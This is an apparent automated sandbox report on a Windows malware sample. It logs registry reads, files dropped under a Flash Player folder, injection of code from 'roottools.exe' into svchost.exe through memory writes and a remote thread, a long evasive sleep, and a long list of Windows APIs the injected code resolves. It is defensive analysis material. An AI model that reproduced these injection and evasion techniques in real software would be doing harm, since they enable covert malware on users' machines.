Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Thread 0x9c4
(Host: 13, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
System Sleep duration = 600000 milliseconds (600.000 seconds) False 1
Fn
Process #13: svchost.exe
(Host: 2024, Network: 0)
+
Information Value
ID #13
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:03:35, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:06:38
OS Process Information
+
Information Value
PID 0x5fc
Parent PID 0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A7C
0x A84
0x A88
0x 970
0x A8C
0x 960
0x 964
0x 968
0x 96C
0x 7A0
0x 89C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x0008bfff Private Memory Readable, Writable, Executable True False False
locale.nls 0x00090000 0x000f6fff Memory Mapped File Readable False False False
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False
rsaenh.dll 0x00120000 0x0015bfff Memory Mapped File Readable False False False
private_0x0000000000120000 0x00120000 0x0015ffff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x0016dfff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x0016cfff Private Memory Readable, Writable True False False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True False False
private_0x0000000000320000 0x00320000 0x0035ffff Private Memory Readable, Writable True False False
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False
private_0x0000000000650000 0x00650000 0x0068ffff Private Memory Readable, Writable True False False
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False
private_0x0000000000720000 0x00720000 0x0072ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000730000 0x00730000 0x008b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000008c0000 0x008c0000 0x00a40fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a50000 0x00a50000 0x00e42fff Pagefile Backed Memory Readable True False False
private_0x0000000000e80000 0x00e80000 0x00ebffff Private Memory Readable, Writable True False False
private_0x0000000000ee0000 0x00ee0000 0x00f1ffff Private Memory Readable, Writable True False False
private_0x0000000000f40000 0x00f40000 0x00f7ffff Private Memory Readable, Writable True False False
private_0x0000000000fa0000 0x00fa0000 0x00fdffff Private Memory Readable, Writable True False False
svchost.exe 0x00fe0000 0x00fe7fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000ff0000 0x00ff0000 0x023effff Pagefile Backed Memory Readable True False False
private_0x00000000023f0000 0x023f0000 0x0265ffff Private Memory Readable, Writable True False False
private_0x0000000002400000 0x02400000 0x0243ffff Private Memory Readable, Writable True False False
private_0x0000000002440000 0x02440000 0x0247ffff Private Memory Readable, Writable True False False
private_0x0000000002490000 0x02490000 0x024cffff Private Memory Readable, Writable True False False
private_0x0000000002530000 0x02530000 0x0256ffff Private Memory Readable, Writable True False False
private_0x0000000002580000 0x02580000 0x025bffff Private Memory Readable, Writable True False False
private_0x00000000025e0000 0x025e0000 0x0265ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x02660000 0x0292efff Memory Mapped File Readable False False False
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x746f0000 0x746f7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74700000 0x7475bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74760000 0x7479efff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74880000 0x748bafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x748c0000 0x748d5fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x748e0000 0x748e7fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0x70000, size = 114688 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0x876c4, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0x877d0, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0x87d38, size = 4 True 1
Fn
Data
Create Remote Thread #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x97c address = 0x795bc True 1
Fn
Threads
Thread 0xa84
(Host: 244, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 True 1
Fn
